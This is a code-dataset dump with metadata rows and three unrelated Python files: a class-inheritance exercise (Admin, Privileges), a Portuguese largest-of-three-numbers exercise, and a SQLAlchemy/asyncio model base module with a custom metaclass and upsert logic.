iceyhexman/onlinetools
|
scanner/plugins/cms/iGenus/igenus_code_exec.py
|
igenus_code_exec.py
|
py
| 1,113 |
python
|
en
|
code
| 1,626 |
github-code
|
6
|
25693151845
|
# coding=gbk
# 9.12 Importing-classes exercise: multiple modules
"""Import the User class from the user module into the Admin/Privileges classes"""
from user import User
class Privileges():
"""创建一个有关管理员权限的小类"""
def __init__(
self,
privileges= ['can add post','can delete post','can ban user']):
"""初始化权限的属性"""
self.privileges = privileges
def show_privileges(self):
"""方法 描述有关管理员权限的职能"""
print("\nThe admin user have these privileges:")
for n in self.privileges:
print("\t",n)
class Admin(User):
"""创建用户类的子类 管理员类"""
def __init__(self,first_name, last_name, gender,age):
"""接受并初始化父类的属性"""
super().__init__(first_name, last_name, gender, age)
self.privileges = Privileges()
user_1 = Admin('lei', 'tianfu', 'male', 21)
user_1.privileges.show_privileges()
user_1.describe_user()
|
Troysps/learn_python
|
77/9.12导入类练习.py
|
9.12导入类练习.py
|
py
| 947 |
python
|
en
|
code
| 0 |
github-code
|
6
|
15028429007
|
n1 = int(input('Digite o primeiro número inteiro: '))
n2 = int(input('Digite o segundo número inteiro: '))
n3 = int(input('Digite o terceiro número inteiro: '))
if n1 > n2 and n1 > n3:
    print(f'O maior número é {n1}')
    input('Pressione ENTER para encerrar programa')
    exit()
if n2 > n1 and n2 > n3:
    print(f'O maior número é {n2}')
    input('Pressione ENTER para encerrar programa')
    exit()
if n3 > n1 and n3 > n2:
    print(f'O maior número é {n3}')
    input('Pressione ENTER para encerrar programa')
    exit()
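# A shorter alternative (sketch): max() avoids repeating the comparisons and also
# handles ties, at the cost of not mirroring the exercise's if/if structure.
#
#   maior = max(n1, n2, n3)
#   print(f'O maior número é {maior}')
#   input('Pressione ENTER para encerrar programa')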
|
LeonardoDaSilvaBrandao/Phyton-Exercicios
|
Faça um Programa que leia três números e mostre o maior deles..py
|
Faça um Programa que leia três números e mostre o maior deles..py
|
py
| 535 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
26660179991
|
'''Model base module'''
import config
import redis
import collections
import asyncio
import sqlalchemy as sa
from sqlalchemy import MetaData
class Relation(object):
def __init__(self, target_cls, back_populates=None, onupdate="CASCADE",
ondelete="CASCADE", rkey=None, reverse=False):
self.target_cls = target_cls
self.back_populates = back_populates
self.onupdate = onupdate
self.ondelete = ondelete
self.rkey = rkey
self.reverse = reverse
def bind(self, key, source_cls):
target_cls = self.target_cls
pkey = target_cls._symbols[target_cls._pname].obj
self.rkey = sa.Column('_rel_{}'.format(key), pkey.type,
sa.ForeignKey(pkey, onupdate=self.onupdate, ondelete=self.ondelete),
index=True)
if self.back_populates is not None:
assert self.back_populates not in self.target_cls._relations
self.target_cls._relations[self.back_populates] = Relation(
source_cls, rkey=self.rkey, reverse=True)
return self.rkey
class Symbol(object):
def __init__(self, obj, immutable, primary):
self.obj = obj
self.immutable = immutable
self.primary = primary
class ShadowColumn(object):
def __init__(self, cls, mapping, prefix):
self.cls = cls
self.mapping = mapping
self.prefix = prefix
def __getattr__(self, name):
column = getattr(self.cls, name)
if isinstance(column, sa.Column):
name = self.prefix + column.name
if name in self.mapping:
return self.mapping[name]
elif isinstance(column, ShadowColumn):
return ShadowColumn(column.cls, self.mapping,
'{}__{}_'.format(self.prefix, name))
raise AttributeError
class ShadowMeta(type):
def build_relation_query(table, relations):
query = table
label_map = {}
for key, relation in relations.items():
prefix = '__' + key
target_cls = relation.target_cls
target_query = target_cls._relquery.alias(prefix)
for column in target_query.columns:
label_map[column] = '{}_{}'.format(prefix, column.name)
query = query.join(target_query,
relation.rkey == target_query.columns[target_cls._pname])
relation_columns = {}
select_columns = []
for column in query.columns:
if column.name.startswith('_rel_'):
continue
if column in label_map:
labeled_column = column.label(label_map[column])
relation_columns[labeled_column.name] = column
column = labeled_column
select_columns.append(column)
return (relation_columns, sa.select(select_columns, from_obj=query))
def __new__(cls, name, bases, namespace):
model_cls = type.__new__(cls, name, bases, namespace)
if name == 'BaseModel':
return model_cls
pname = None
symbols = {}
columns = {}
relations = {}
pkey_constraint = None
attrs = list(model_cls.__dict__.items())
for key, value in attrs:
if key == '__primarykey__':
pkey_constraint = sa.PrimaryKeyConstraint(
*[column.name for column in value])
continue
if (not isinstance(value, Relation) and
not isinstance(value, sa.Column)):
continue
immutable = False
primary = False
name = key
if key.startswith('_'):
name = name.lstrip('_')
immutable = True
if isinstance(value, Relation):
relations[name] = value
elif isinstance(value, sa.Column):
columns[name] = value
primary = value.primary_key
if primary:
assert pname is None
pname = name
symbols[name] = Symbol(value, immutable, primary)
delattr(model_cls, key)
model_cls._pname = pname
table_columns = list(columns.values())
for key, relation in relations.items():
table_columns.append(relation.bind(key, model_cls))
if pkey_constraint is not None:
table_columns.append(pkey_constraint)
model_cls._columns = columns
model_cls._relations = relations
model_cls._symbols = symbols
model_cls._table = sa.Table(namespace['__tablename__'],
model_cls._metadata, *table_columns)
model_cls._relcolumns, model_cls._relquery = cls.build_relation_query(
model_cls._table, relations)
return model_cls
def __getattr__(self, name):
if name not in self._symbols:
raise AttributeError
symbol = self._symbols[name]
if isinstance(symbol.obj, sa.Column):
return symbol.obj
elif isinstance(symbol.obj, Relation):
relation = symbol.obj
if not relation.reverse:
return ShadowColumn(relation.target_cls, self._relcolumns,
'__{}_'.format(name))
raise AttributeError
class ShadowExpr(object):
def __init__(self, expr, typ=None):
self.expr = expr
self.typ = typ
def __getattr__(self, name):
func = getattr(self.expr, name)
def wrapper(*args, **kwargs):
'''Wrapper.'''
proxy_args = []
for value in args:
proxy_args.append(self.proxy_value(value))
proxy_kwargs = {}
for key, value in kwargs.items():
proxy_kwargs[key] = self.proxy_value(value)
return ShadowExpr(func(*proxy_args, **proxy_kwargs), typ=self.typ)
return wrapper
def proxy_value(self, value):
if isinstance(value, ShadowExpr):
return value.expr
elif isinstance(value, ShadowMeta):
return value._table
return value
async def execute(self, conn):
results = await conn.execute(self.expr)
return ShadowResult(results, self.typ)
class ShadowResult(object):
def __init__(self, results, typ):
self.results = results
self.rowcount = self.results.rowcount
self.typ = typ
def __aiter__(self):
return self
async def __anext__(self):
result = await self.results.fetchone()
if result is None:
raise StopAsyncIteration
if self.typ is None:
return result
else:
return self.typ(result)
async def first(self):
result = await self.results.fetchone()
self.results.close()
if result is None:
return None
elif self.typ is None:
return result
else:
return self.typ(result)
async def scalar(self):
result = await self.results.scalar()
if result is None:
return None
elif self.typ is None:
return result
else:
return self.typ(result)
class BaseModel(object, metaclass=ShadowMeta):
_metadata = MetaData()
def __init__(self, _result_obj=None, _prefix='', **kwargs):
if _result_obj is not None:
fields = dict((key, _result_obj[_prefix + column.name])
for key, column in self._columns.items())
for key, relation in self._relations.items():
if not relation.reverse:
target_cls = relation.target_cls
next_prefix = '{}__{}_'.format(_prefix, key)
fields[key] = target_cls(_result_obj, next_prefix)
else:
fields = {}
for key, column in self._columns.items():
value = None
if key in kwargs:
value = kwargs[key]
elif key != self._pname:
raise AttributeError
fields[key] = value
for key, relation in self._relations.items():
if not relation.reverse and key in kwargs:
fields[key] = kwargs[key]
object.__setattr__(self, '_fields', fields)
if self._pname is not None:
self.update_reverse_relations()
def __getattr__(self, name):
return self._fields[name]
def __setattr__(self, name, value):
override_mutable = False
if name.startswith('_'):
name = name.lstrip('_')
override_mutable = True
symbol = self._symbols.get(name)
if symbol is None:
raise AttributeError
if symbol.primary:
raise AttributeError
if symbol.immutable and not override_mutable:
raise AttributeError
if isinstance(symbol.obj, Relation):
relation = symbol.obj
if relation.reverse:
raise AttributeError
self._fields[name] = value
def update_reverse_relations(self):
pval = self._fields[self._pname]
reverse_relations = [(key, relation) for key, relation
in self._relations.items() if relation.reverse]
if pval is None:
for key, relation in reverse_relations:
if key in self._fields:
del self._fields[key]
else:
for key, relation in reverse_relations:
self._fields[key] = (relation.target_cls.select()
.where(relation.rkey == pval))
async def save(self, conn):
table_fields = {}
for key, column in self._columns.items():
if key not in self._fields:
raise AttributeError
if key == self._pname and self._fields[key] is None:
continue
table_fields[column.name] = self._fields[key]
for key, relation in self._relations.items():
if relation.reverse:
continue
if key not in self._fields:
raise AttributeError
target = self._fields[key]
target_pval = getattr(target, target._pname)
assert target_pval is not None
table_fields[relation.rkey.name] = target_pval
expr = (sa.dialects.postgresql.insert(self._table)
.values(**table_fields)
.on_conflict_do_update(
constraint=self._table.primary_key,
set_=table_fields
))
if self._pname is not None:
pkey = self._symbols[self._pname].obj
expr = expr.returning(pkey)
result = await conn.execute(expr)
if self._pname is not None:
pval = await result.scalar()
assert pval is not None
self._fields[self._pname] = pval
# Since we may change the primary value, update reversed relation
# queries.
self.update_reverse_relations()
@classmethod
def select(cls):
return ShadowExpr(cls._relquery, typ=cls)
@classmethod
def delete(cls):
return ShadowExpr(cls._table.delete())
@classmethod
def join(cls, other, *args, **kwargs):
return ShadowExpr(cls._table.join(other._table, *args, **kwargs))
def select(fields, cls=None):
query_fields = []
for field in fields:
if isinstance(field, BaseModel):
field = field._table
query_fields.append(field)
return ShadowExpr(sa.select(query_fields), typ=cls)
def model_context(func):
class Context:
def __init__(self, conn, redis):
self.conn = conn
self.redis = redis
async def wrapper(*args, **kwargs):
'''Wrapper.'''
task = asyncio.Task.current_task()
ctx = Context(task._conn, task._redis)
return await func(*args, **kwargs, ctx=ctx)
return wrapper
def create_schemas(db_url):
# Make sure to load all schemas.
import model.user
import model.scoring
import model.problem
import model.proset
import model.challenge
engine = sa.create_engine(db_url)
BaseModel._metadata.create_all(engine)
engine.dispose()
def drop_schemas(db_url):
# Make sure to load all schemas.
import model.user
import model.scoring
import model.problem
import model.proset
import model.challenge
engine = sa.create_engine(db_url)
BaseModel._metadata.drop_all(engine)
engine.dispose()
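# Illustrative sketch (hypothetical models, not part of this package): how a table
# and a relation could be declared with the metaclass above. A leading underscore
# marks an immutable attribute, and the primary-key column is detected automatically.
#
#   import sqlalchemy as sa
#
#   class Category(BaseModel):
#       __tablename__ = 'category'
#       _uid = sa.Column('uid', sa.Integer, primary_key=True)
#       name = sa.Column('name', sa.String)
#
#   class Item(BaseModel):
#       __tablename__ = 'item'
#       _uid = sa.Column('uid', sa.Integer, primary_key=True)
#       title = sa.Column('title', sa.String)
#       category = Relation(Category, back_populates='items')
#
#   # Item.select() joins the related Category columns, item.category is loaded
#   # as a Category instance, and category.items yields a reverse select query.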
|
SproutProject/sptoj-server
|
model/__init__.py
|
__init__.py
|
py
| 12,647 |
python
|
en
|
code
| 0 |
github-code
|
6
|